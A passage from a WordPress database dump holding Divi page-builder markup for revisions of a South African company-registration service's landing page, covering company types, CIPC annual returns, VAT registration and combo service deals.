custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/tax-registrations\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p class=\"\"><strong>Business Professionals  such as </strong><b>Accountants, Lawyers and Doctors practicing.</b></p>[/et_pb_cta][et_pb_toggle title=\"View More\" _builder_version=\"3.26.6\" custom_margin=\"-41px||||false|false\"]<p><strong>What type of companies that can be registered</strong><span> </span>in terms of the New Companies Act 71, 2008</p>\n<ul>\n<li>Private company (Pty) Ltd</li>\n<li>Public company (Ltd)</li>\n<li>State-owned company (SOC)</li>\n<li>External company</li>\n<li>Personal liability company (Inc)</li>\n<li>Non-profit company (NPC)</li>\n</ul>[/et_pb_toggle][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Conbo Deals\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/maintaining-your-company\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p style=\"text-align: center;\"><strong>Businesses with  shareholders who are not directly involved in running the business</strong></p>[/et_pb_cta][et_pb_toggle title=\"View More\" _builder_version=\"3.26.6\" custom_margin=\"-41px||||false|false\"]<p><strong>What type of companies that can be registered</strong><span> </span>in terms of the New Companies Act 71, 2008</p>\n<ul>\n<li>Private company (Pty) Ltd</li>\n<li>Public company (Ltd)</li>\n<li>State-owned company (SOC)</li>\n<li>External company</li>\n<li>Personal liability company (Inc)</li>\n<li>Non-profit company (NPC)</li>\n</ul>[/et_pb_toggle][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.26.6\"][et_pb_row column_structure=\"2_3,1_3\" _builder_version=\"3.26.6\"][et_pb_column type=\"2_3\" _builder_version=\"3.26.6\"][et_pb_shop type=\"product_category\" posts_number=\"6\" include_categories=\"8,7,17\" _builder_version=\"3.26.6\" columns_number=\"3\"][/et_pb_shop][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.26.6\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-developer-illustration-small-03-1.png\" _builder_version=\"3.26.6\" max_width=\"100%\" width=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.22.3\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.12)\" background_color_gradient_type=\"radial\" background_color_gradient_start_position=\"75%\" custom_padding=\"7px|0px|6px|0px\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"28px|0px|4px|0px\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.0.89\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Other Registration Categories</span></strong></span></h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text disabled_on=\"on|on|off\" _builder_version=\"3.3.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Combo Deals<br /></span></strong></span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_4,1_4\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/tax-registration/\" use_icon=\"on\" font_icon=\"%%155%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Tax Registration\" _builder_version=\"3.0.87\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/product-category/tax-registration/\">Tax Registration</a></h4>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"combo deals\" _builder_version=\"3.2.1\" custom_padding=\"25px||80px|\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1200ms\" animation_delay=\"450ms\" inline_fonts=\"Abel\"]<h2 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; color: #c10097;\"><strong><a href=\"https://companyregistration.online/combo-services/\">Save by getting a combo of services here</a><br />\r\n</strong></span><a href=\"https://companyregistration.online/combo-services/\" rel=\"https://companyregistration.online/pricing-table/\"><img class=\"alignright wp-image-28359\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/advance1600-300x300.png\" alt=\"\" width=\"103\" height=\"103\" /></a></h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/combo-services/\" use_icon=\"on\" font_icon=\"%%151%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Combo Savings\" _builder_version=\"3.0.89\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" animation_style=\"slide\" animation_direction=\"right\" animation_delay=\"750ms\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/combo-services/\">Combo Savings</a></h4>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section]','Landing style 2','','inherit','closed','closed','','31906-revision-v1','','','2019-08-15 11:47:26','2019-08-15 09:47:26','',31906,'https://companyregistration.online/31906-revision-v1/',0,'revision','',0),(32786,3,'2019-08-15 12:11:53','2019-08-15 10:11:53','[et_pb_section fb_built=\"1\" inner_shadow=\"on\" _builder_version=\"3.26.3\" background_image=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" background_size=\"contain\" background_repeat=\"repeat-y\" custom_padding=\"3px|0px|0px|0px\" top_divider_style=\"wave2\" top_divider_color=\"rgba(0,0,0,0)\" top_divider_height=\"46px\" top_divider_flip=\"horizontal\" animation_style=\"zoom\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Flags\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.26.3\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"10px|0px|0px|0px\" make_fullwidth=\"on\" locked=\"off\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2000ms\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align=\"right\" align_tablet=\"center\" align_last_edited=\"on|desktop\" disabled_on=\"on|on|off\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2500ms\" animation_delay=\"200ms\" animation_starting_opacity=\"8%\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.24\" background_color=\"#ffffff\" parallax=\"on\" custom_padding=\"20px|0px|1px|0px|false|false\"][et_pb_row module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px|0px|0px|0px\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_tabs active_tab_background_color=\"#7cda24\" inactive_tab_background_color=\"#e8e8e8\" _builder_version=\"3.24\" tab_font=\"|700|||||||\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.16)\" background_color_gradient_direction=\"179deg\" background_color_gradient_start_position=\"37%\" border_radii=\"on|10px|10px|10px|10px\" box_shadow_style=\"preset2\" animation_style=\"fold\" animation_direction=\"bottom\" animation_duration=\"1200ms\" animation_delay=\"100ms\"][et_pb_tab title=\"One stop\" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\"]<h3 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>All the registrations you require to get your company compliant and ready for business anywhere in <span style=\"font-size: x-large;\"><span style=\"color: #154907;\">S</span><span style=\"color: #e09900;\">o<span style=\"color: #184c0d;\">u</span><span style=\"color: #e02b20;\">t</span><span style=\"color: #0c71c3;\">h</span> <span style=\"color: #000000;\">A</span>f<span style=\"color: #195e10;\">r</span><span style=\"color: #e02b20;\">i</span><span style=\"color: #0c71c3;\">c</span><span style=\"color: #000000;\">a</span></span></span></strong></span></h3>\r[/et_pb_tab][et_pb_tab title=\"For Tenders\" _builder_version=\"3.2.1\" body_font=\"||||\" tab_font=\"Abel||||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4><strong><span style=\"font-family: Abel;\">Get all the registrations documents<a href=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" target=\"_blank\" rel=\"noopener noreferrer\" title=\"Tender Ready\"> <span style=\"color: #993366;\">for your tender</span> </a>fast tracked and professionally done so that no opportunity is missed.</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Secure Payment Gateway\" _builder_version=\"3.24\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">We use a trusted South African payment gateway. No credit card information is maintained on our site. The payment gateway is a member of the Payments Association of South Africa (PASA)?</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Simple process\" _builder_version=\"3.24\" body_font=\"||||||||\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">Purchase the service, complete the form, if applicable, submit supporting documentation and RELAX, you done, all from your arm chair.</span></strong></h4>\n<p style=\"text-align: center;\"><span style=\"color: #333399;\"><strong><span style=\"font-family: Abel;\">PROFESSIONAL,SIMPLE &amp; CONVENIENT</span></strong></span></p>[/et_pb_tab][et_pb_tab title=\"Professional Service\" _builder_version=\"3.2.1\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>We advise you on the appropriate company to register and keep you informed all the way until the work process is complete or registered . We will also facilitate the opening of the business bank account anywhere in South Africa<br /> </strong></span></h4>[/et_pb_tab][et_pb_tab title=\"Visit Blog/FAQs \" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\"><span style=\"color: #0c71c3;\"><a href=\"https://companyregistration.online/category/faqs/\" style=\"color: #0c71c3;\">Valuable information</a></span> about the right company to register, consequences of deregistration, difference between CIPC Annual Return and AnnualTax Return, etc</span></strong></h4>[/et_pb_tab][/et_pb_tabs][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.26.6\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"3.26.6\"][et_pb_column type=\"1_2\" _builder_version=\"3.26.6\"][et_pb_divider show_divider=\"off\" _builder_version=\"3.26.6\" height=\"125px\"][/et_pb_divider][et_pb_text _builder_version=\"3.26.6\" text_font=\"|700|||||||\" header_font=\"|700|||||||\" header_text_align=\"center\" header_font_size=\"47px\"]<h1 style=\"text-align: center;\">What Would You Like To Do First ?</h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.26.6\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/working-free-img.jpg\" _builder_version=\"3.26.6\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" _builder_version=\"3.26.6\" width=\"98%\" max_width=\"1347px\" module_alignment=\"center\" custom_margin=\"|223px||427px||\"][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Register A Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/company-registrations/\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p style=\"text-align: center;\"><strong>Businesses with 1 shareholder directly involved in running the business</strong></p>[/et_pb_cta][et_pb_toggle title=\"View More\" _builder_version=\"3.26.6\" custom_margin=\"-41px||||false|false\"]<p><strong>What type of companies that can be registered</strong><span> </span>in terms of the New Companies Act 71, 2008</p>\n<ul>\n<li>Private company (Pty) Ltd</li>\n<li>Public company (Ltd)</li>\n<li>State-owned company (SOC)</li>\n<li>External company</li>\n<li>Personal liability company (Inc)</li>\n<li>Non-profit company (NPC)</li>\n</ul>[/et_pb_toggle][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Maintain My Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p style=\"text-align: center;\"><strong>Businesses with  shareholders who are not directly involved in running the business</strong></p>[/et_pb_cta][et_pb_toggle title=\"View More\" _builder_version=\"3.26.6\" custom_margin=\"-41px||||false|false\"]<p><span>All companies (including external companies) and close corporations are required by law to file their annual returns with the CIPC on an annual basis, within a prescribed time period. The purpose for the filing of such annual returns is to confirm whether a company or close corporation is still in business/trading, or if it will be in business in the near future.</span></p>[/et_pb_toggle][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Register For Tax\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/tax-registrations\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p class=\"\"><strong>Business Professionals  such as </strong><b>Accountants, Lawyers and Doctors practicing.</b></p>[/et_pb_cta][et_pb_toggle title=\"View More\" _builder_version=\"3.26.6\" custom_margin=\"-41px||||false|false\"]<p>Any person that carries on a business may register for VAT. The term person is not only limited to companies but also includes, amongst others, individuals, partnerships, trust funds, foreign donor funded projects and municipalities.</p>\n<p>It is<span> </span><span>mandatory</span><span> </span>for a person to register for VAT if sales made from selling goods or services is in excess of R1 million in any consecutive twelve month period.</p>\n[/et_pb_toggle][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Conbo Deals\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/maintaining-your-company\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p style=\"text-align: center;\"><strong>Businesses with  shareholders who are not directly involved in running the business</strong></p>[/et_pb_cta][et_pb_toggle title=\"View More\" _builder_version=\"3.26.6\" custom_margin=\"-41px||||false|false\"]<p><b>Each Company Is Unique In Its Own Right</b></p>\n<p><b></b></p>\n<p>Customize your package and save <span style=\"color: #ff00ff;\">BIG</span></p>\n[/et_pb_toggle][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.26.6\"][et_pb_row column_structure=\"2_3,1_3\" _builder_version=\"3.26.6\" width=\"89%\" max_width=\"1490px\" module_alignment=\"center\" custom_margin=\"|217px||221px||\"][et_pb_column type=\"2_3\" _builder_version=\"3.26.6\"][et_pb_shop type=\"product_category\" posts_number=\"6\" include_categories=\"8,7,17\" columns_number=\"3\" _builder_version=\"3.26.6\"][/et_pb_shop][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.26.6\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-developer-illustration-small-03-1.png\" _builder_version=\"3.26.6\" width=\"100%\" max_width=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.22.3\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.12)\" background_color_gradient_type=\"radial\" background_color_gradient_start_position=\"75%\" custom_padding=\"7px|0px|6px|0px\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"28px|0px|4px|0px\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.0.89\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Other Registration Categories</span></strong></span></h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text disabled_on=\"on|on|off\" _builder_version=\"3.3.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Combo Deals<br /></span></strong></span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_4,1_4\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/tax-registration/\" use_icon=\"on\" font_icon=\"%%155%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Tax Registration\" _builder_version=\"3.0.87\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/product-category/tax-registration/\">Tax Registration</a></h4>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"combo deals\" _builder_version=\"3.2.1\" custom_padding=\"25px||80px|\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1200ms\" animation_delay=\"450ms\" inline_fonts=\"Abel\"]<h2 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; color: #c10097;\"><strong><a href=\"https://companyregistration.online/combo-services/\">Save by getting a combo of services here</a><br />\r\n</strong></span><a href=\"https://companyregistration.online/combo-services/\" rel=\"https://companyregistration.online/pricing-table/\"><img class=\"alignright wp-image-28359\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/advance1600-300x300.png\" alt=\"\" width=\"103\" height=\"103\" /></a></h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/combo-services/\" use_icon=\"on\" font_icon=\"%%151%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Combo Savings\" _builder_version=\"3.0.89\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" animation_style=\"slide\" animation_direction=\"right\" animation_delay=\"750ms\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/combo-services/\">Combo Savings</a></h4>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section]','Landing style 2','','inherit','closed','closed','','31906-revision-v1','','','2019-08-15 12:11:53','2019-08-15 